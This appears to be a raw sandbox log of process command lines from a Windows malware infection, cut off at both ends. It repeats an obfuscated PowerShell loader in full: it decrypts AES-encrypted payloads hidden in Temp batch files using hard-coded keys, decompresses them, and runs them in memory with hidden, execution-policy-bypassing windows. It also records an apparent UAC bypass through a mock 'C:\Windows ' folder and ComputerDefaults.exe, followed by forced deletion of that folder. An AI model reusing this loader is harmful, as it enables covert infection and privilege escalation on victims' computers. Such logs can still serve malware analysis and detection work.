}}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Crypt.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ready.bat" "
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\Crypt.bat';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; }}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); $JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\Ready.bat';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); $JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = 